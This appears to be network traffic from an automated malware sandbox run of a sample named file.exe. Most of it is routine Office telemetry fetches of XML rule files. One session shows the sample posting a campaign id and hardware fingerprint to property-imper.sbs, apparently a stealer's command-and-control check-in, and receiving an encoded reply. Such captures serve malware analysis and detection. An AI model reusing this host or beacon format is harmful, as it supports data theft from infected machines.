                                                                                                                                                                                          2024-11-23 16:44:26 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          12192.168.2.54972113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:25 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 408
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                          x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164425Z-178bfbc474bpnd5vhC1NYC4vr400000004t00000000051sf
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:26 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          13192.168.2.54971813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:25 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:25 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 450
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                          ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                          x-ms-request-id: 0e051980-b01e-005c-631b-3d4c66000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164425Z-178bfbc474bwlrhlhC1NYCy3kg00000004sg000000007505
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:26 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          14192.168.2.549728172.67.162.84443828C:\Users\user\Desktop\file.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:27 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                          Content-Length: 88
                                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                                          2024-11-23 16:44:27 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 37 37 41 46 30 37 43 42 37 41 31 36 30 35 38 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=77AF07CB7A160586D7CBBD6DF28D3732
                                                                                                                                                                                          2024-11-23 16:44:28 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:28 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Set-Cookie: PHPSESSID=tc1bcuhfmf8a2dr4lv4avs439e; expires=Wed, 19-Mar-2025 10:31:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RUakQVfQh%2FMpLQPjX304wgUYxD8%2BfKQ8TKRuzul3B8pjnvl%2FL%2B4FUwie8hLV5jkTkELRMYsqgXhSrAEwMhVSYEdutY7oMmVg7%2FDLAnNF8bMleFNtbgWacG3a8%2B2sRoa2oAZSGo4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8e729fc28e3f19cb-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1809&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=1583514&cwnd=247&unsent_bytes=0&cid=b6aa1ffcde95c14f&ts=733&x=0"
                                                                                                                                                                                          2024-11-23 16:44:28 UTC295INData Raw: 31 32 30 0d 0a 46 58 47 4e 62 34 57 4c 57 67 44 55 51 62 33 41 77 49 77 55 50 6f 2b 4d 70 35 56 44 50 47 32 52 73 75 70 78 56 31 35 41 35 4f 6c 4f 43 71 38 61 70 37 46 34 61 4b 41 31 7a 66 71 63 6f 30 67 52 76 72 53 53 75 33 45 4e 57 4c 2b 44 32 30 4a 35 62 33 61 34 78 6e 6f 58 36 7a 4f 71 37 7a 39 6d 2b 69 54 46 70 65 4b 67 4e 6c 6a 37 72 70 32 6c 62 78 34 49 73 34 6a 62 44 48 73 6c 59 70 48 4c 4c 31 50 6c 47 2f 48 37 59 46 7a 37 48 5a 4c 78 2b 4c 6b 36 44 4c 36 35 69 61 52 79 44 30 4f 67 68 4c 5a 65 4a 43 6f 6c 68 59 52 4a 58 76 38 4f 36 2b 38 31 62 66 6f 6b 78 61 58 69 6f 44 5a 59 2b 36 36 64 70 57 38 65 43 4c 4f 49 32 67 78 37 4a 57 4b 52 79 79 39 54 35 52 76 78 2b 32 42 63 2b 78 32 53 38 2f 47 69 49 41 2b 68 76 70 4f 68 62 51 31 63 7a 5a 32 4d 47 44
                                                                                                                                                                                          Data Ascii: 120FXGNb4WLWgDUQb3AwIwUPo+Mp5VDPG2RsupxV15A5OlOCq8ap7F4aKA1zfqco0gRvrSSu3ENWL+D20J5b3a4xnoX6zOq7z9m+iTFpeKgNlj7rp2lbx4Is4jbDHslYpHLL1PlG/H7YFz7HZLx+Lk6DL65iaRyD0OghLZeJColhYRJXv8O6+81bfokxaXioDZY+66dpW8eCLOI2gx7JWKRyy9T5Rvx+2Bc+x2S8/GiIA+hvpOhbQ1czZ2MGD
                                                                                                                                                                                          2024-11-23 16:44:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          15192.168.2.54972313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:27 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:28 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9964B277"
                                                                                                                                                                                          x-ms-request-id: 614243f2-101e-000b-1164-3d5e5c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164428Z-178bfbc474bwh9gmhC1NYCy3rs00000004ug000000007utm
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:28 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          16192.168.2.54972413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:27 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:28 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 415
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                          x-ms-request-id: 3cf7f359-901e-005b-4f39-3d2005000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164428Z-178bfbc474bnwsh4hC1NYC2ubs00000004x0000000000uz1
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          17192.168.2.54972713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:27 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:28 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 467
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                          ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                          x-ms-request-id: ba9b913e-601e-0001-2f1a-3dfaeb000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164428Z-178bfbc474bgvl54hC1NYCsfuw00000004m000000000kmge
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:28 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          18192.168.2.54972613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:28 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:28 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 471
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                          x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164428Z-174c587ffdf89smkhC1TEB697s000000035000000000qm5f
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          19192.168.2.54972513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:28 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:28 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 632
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                          x-ms-request-id: 5e8702c1-301e-000c-0b8f-3b323f000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164428Z-174c587ffdfp4vpjhC1TEBybqw000000033g00000000nct0
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:28 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          20192.168.2.54972913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:30 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:30 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                          ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                          x-ms-request-id: bddf9f2e-a01e-0002-120c-3d5074000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164430Z-178bfbc474bwlrhlhC1NYCy3kg00000004t0000000005u5u
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
